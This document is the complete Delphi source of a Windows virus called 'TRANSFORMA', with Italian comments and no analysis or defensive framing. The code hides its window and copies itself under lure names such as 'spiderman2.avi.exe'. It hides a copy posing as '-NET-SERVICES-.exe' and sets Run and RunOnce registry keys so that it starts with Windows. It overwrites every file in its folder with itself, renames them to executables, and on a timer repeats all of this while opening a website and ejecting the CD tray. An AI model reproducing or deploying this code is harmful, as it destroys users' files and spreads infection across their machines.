TRANSFORMA - Delphi Virus Source Code

1. unit Unit1;
2.  
3. interface
4. {RICORDARSI DI DICHIARARE ShellAPI IN USES}
5. uses
6. Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
7. Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;
8.  
9. type
10. TForm1 = class(TForm)
11. Timer1: TTimer;
12. Timer2: TTimer;
13. procedure Timer2Timer(Sender: TObject);
14. procedure Timer1Timer(Sender: TObject);
15. procedure FormCreate(Sender: TObject);
16.  
17.  
18. private
19. { Private declarations }
20. public
21. { Public declarations }
22. end;
23.  
24. var
25. Form1: TForm1;
26.  
27. implementation
28.  
29. {$R *.dfm}
30. {{$R MySoundRes.RES}
31.  
32.  
33. procedure TForm1.FormCreate(Sender: TObject);
34.  
35. {DICHIRAZIONE VARIABILI}
36. var
37. regis: TRegistry;
38. APath: string;
39. MySearch: TSearchRec;
40. dir : string;
41. {i : integer;}
42. {x : integer;}
43. {F:TextFile;}
44. reg1:TRegistry;
45. reg2:TRegistry;
46. windir:array[0..255] of char;
47. sysdir:array[0..255] of char;
48. {+++++++++++++++++++++++++++++++++++}
49. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
50. begin
51. {FORM INVISIBILE}
52. Application.ShowMainForm := false;
53.  {COPIA SE STESSO}
54. begin
55. getwindowsdirectory(windir,sizeof(windir));
56. getsystemdirectory(sysdir,sizeof(sysdir));
57. try
58. mkdir(sysdir+'\runfold');
59. except
60. end;
61. try
62. CopyFile(pchar(application.ExeName),PChar(windir+'\try now.exe'),true);
63. CopyFile(pchar(application.ExeName),PChar(windir+'\elvis2005.exe'),true);
64. CopyFile(pchar(application.ExeName),PChar(windir+'\my way.exe'),true);
65. CopyFile(pchar(application.ExeName),PChar(windir+'\sinatra.exe'),true);
66. CopyFile(pchar(application.ExeName),PChar(windir+'\burn dvd.exe'),true);
67. CopyFile(pchar(application.ExeName),PChar(windir+'\spiderman2.avi.exe'),true);
68. CopyFile(pchar(application.ExeName),PChar(sysdir+'\runfold\-NET-SERVICES-.exe'),true);
69. except
70. end;
71. end;
72. {+++++++++++++++++++++++++++++++++++}
73. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
74. {RENDE SE STESSO INVISIBILE}
75. begin
76. getsystemdirectory(sysdir,sizeof(sysdir));
77. try
78. SetFileAttributes(PChar(sysdir+'\runfold\-NET-SERVICES-.exe'), FILE_ATTRIBUTE_HIDDEN);
79. except
80. end;
81. end;
82. {+++++++++++++++++++++++++++++++++++}
83. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
84. {DISABILITA TASK MANAGER}
85. try
86. regis := TRegistry.Create;
87. regis.RootKey := HKEY_CURRENT_USER;
88.  
89. regis.OpenKey('Software', True);
90. regis.OpenKey('Microsoft', True);
91. regis.OpenKey('Windows', True);
92. regis.OpenKey('CurrentVersion', True);
93. regis.OpenKey('Policies', True);
94. regis.OpenKey('System', True);
95. regis.WriteString('DisableTaskMgr', '0');
96. regis.CloseKey;
97. except
98. end;
99. {+++++++++++++++++++++++++++++++++++}
100. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
101. {CREA LA CHIAVE DI REGISTRO IN RUN}
102. begin
103. try
104. getsystemdirectory(sysdir,sizeof(sysdir));
105. reg1 := TRegistry.Create;
106. reg1.RootKey := HKEY_LOCAL_MACHINE;
107. if reg1.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',True) then
108. reg1.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
109. reg1.CloseKey;
110. {CREA LA CHIAVE DI REGISTRO IN RUNONCE}
111. reg2 := TRegistry.Create;
112. reg2.RootKey := HKEY_LOCAL_MACHINE;
113. if reg2.OpenKey('Software\Microsoft\Windows\CurrentVersion\RunOnce',True) then
114. reg2.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
115. reg2.CloseKey;
116. except
117. end;
118. end;
119.  {+++++++++++++++++++++++++++++++++++}
120. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
121. {INFETTA TUTTI I FILES NELLA CARTELLA DI RESIDENZA}
122. begin
123. try
124. dir := GetCurrentDir;
125. APath:= dir;
126. FindFirst(APath+'\*.*', faAnyFile, MySearch);
127. refresh;
128. while FindNext(MySearch)=0 do
129. begin
130. copyFile (pchar(application.ExeName),pchar(APath+'\'+MySearch.Name),false);
131. refresh;
132. end;
133. FindClose(MySearch);
134. except
135. end;
136. end;
137. refresh;
138. {+++++++++++++++++++++++++++++++++++}
139. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
140. {TRASFORMA I FILES INFETTI IN SE STESSO}
141. begin
142. try
143. dir := GetCurrentDir;
144. APath:= dir;
145. FindFirst(APath+'\*.*', faAnyFile, MySearch);
146. refresh;
147. while FindNext(MySearch)=0 do
148. begin
149. renamefile (pchar(APath+'\'+MySearch.Name),pchar(APath+'\'+MySearch.Name+'.exe'));
150. renamefile (pchar(application.ExeName+'.exe'),pchar(application.ExeName));
151. refresh;
152. end;
153. FindClose(MySearch);
154. except
155. end;
156. end;
157. refresh;
158. end;
159. {+++++++++++++++++++++++++++++++++++}
160. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
161. procedure TForm1.Timer1Timer(Sender: TObject);
162. {SOTTO L'EVENTO TIMER EFFETTUA AGGIORNAMENTO REGISTRO,COPIA SE STESSO,RENDE SE STESSO INVISIBILE}
163. {DICHIRAZIONE VARIABILI}
164. var
165. regis: TRegistry;
166. reg1:TRegistry;
167. reg2:TRegistry;
168. windir:array[0..255] of char;
169. sysdir:array[0..255] of char;
170. {+++++++++++++++++++++++++++++++++++}
171. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
172. begin
173. begin
174. getwindowsdirectory(windir,sizeof(windir));
175. getsystemdirectory(sysdir,sizeof(sysdir));
176. try
177. mkdir(sysdir+'\runfold');
178. except
179. end;
180. try
181. CopyFile(pchar(application.ExeName),PChar(windir+'\try now.exe'),true);
182. CopyFile(pchar(application.ExeName),PChar(windir+'\elvis2005.exe'),true);
183. CopyFile(pchar(application.ExeName),PChar(windir+'\my way.exe'),true);
184. CopyFile(pchar(application.ExeName),PChar(windir+'\sinatra.exe'),true);
185. CopyFile(pchar(application.ExeName),PChar(windir+'\burn dvd.exe'),true);
186. CopyFile(pchar(application.ExeName),PChar(windir+'\spiderman2.avi.exe'),true);
187. CopyFile(pchar(application.ExeName),PChar(sysdir+'\runfold\-NET-SERVICES-.exe'),true);
188. except
189. end;
190. end;
191. {+++++++++++++++++++++++++++++++++++}
192. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
193. {RENDE SE STESSO INVISIBILE}
194. begin
195. getsystemdirectory(sysdir,sizeof(sysdir));
196. try
197. SetFileAttributes(PChar(sysdir+'\runfold\-NET-SERVICES-.exe'), FILE_ATTRIBUTE_HIDDEN);
198. except
199. end;
200. end;
201. {+++++++++++++++++++++++++++++++++++}
202. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
203. {DISABILITA TASK MANAGER}
204. begin
205. try
206. regis := TRegistry.Create;
207. regis.RootKey := HKEY_CURRENT_USER;
208. regis.OpenKey('Software', True);
209. regis.OpenKey('Microsoft', True);
210. regis.OpenKey('Windows', True);
211. regis.OpenKey('CurrentVersion', True);
212. regis.OpenKey('Policies', True);
213. regis.OpenKey('System', True);
214. regis.WriteString('DisableTaskMgr', '0');
215. regis.CloseKey;
216. except
217. end;
218. end;
219. {+++++++++++++++++++++++++++++++++++}
220. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
221. begin
222. try
223. getsystemdirectory(sysdir,sizeof(sysdir));
224. reg1 := TRegistry.Create;
225. reg1.RootKey := HKEY_LOCAL_MACHINE;
226. if reg1.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',True) then
227. reg1.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
228. reg1.CloseKey;
229. {CREA LA CHIAVE DI REGISTRO IN RUNONCE}
230. reg2 := TRegistry.Create;
231. reg2.RootKey := HKEY_LOCAL_MACHINE;
232. if reg2.OpenKey('Software\Microsoft\Windows\CurrentVersion\RunOnce',True) then
233. reg2.WriteString('.NET.',sysdir+'\runfold\-NET-SERVICES-.exe');
234. reg2.CloseKey;
235. except
236. end;
237. end;
238. {+++++++++++++++++++++++++++++++++++}
239. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
240. try
241. ShellExecute(0, 'open', 'www.ebay.com', nil, nil,  SW_NORMAL);
242. mciSendString('Set cdaudio door open', nil, 0, handle);
243. except
244. end;
245. timer2.Enabled:= true;
246. timer1.Enabled:= false;
247. end;
248.  
249. procedure TForm1.Timer2Timer(Sender: TObject);
250. begin
251. try
252.  mciSendString('Set cdaudio door closed', nil, 0, handle);
253. except
254. end;
255. timer1.Enabled:= true;
256. timer2.Enabled:= false;
257. {+++++++++++++++++++++++++++++++++++}
258. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
259. {+++++++++++++++++++++++++++++++++++}
260. {%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
261. end;
262.  
263. end.